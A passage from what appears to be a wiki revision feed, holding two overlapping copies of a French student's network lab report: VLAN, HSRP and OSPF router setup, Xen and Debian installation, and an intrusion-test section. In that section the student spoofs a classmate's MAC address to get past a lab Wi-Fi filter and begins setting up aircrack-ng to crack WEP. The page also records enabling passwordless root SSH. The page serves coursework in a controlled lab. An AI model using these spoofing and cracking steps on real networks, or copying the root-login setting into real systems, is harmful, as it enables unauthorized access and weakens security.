Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22948</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22948"/>
				<updated>2015-11-13T14:54:43Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
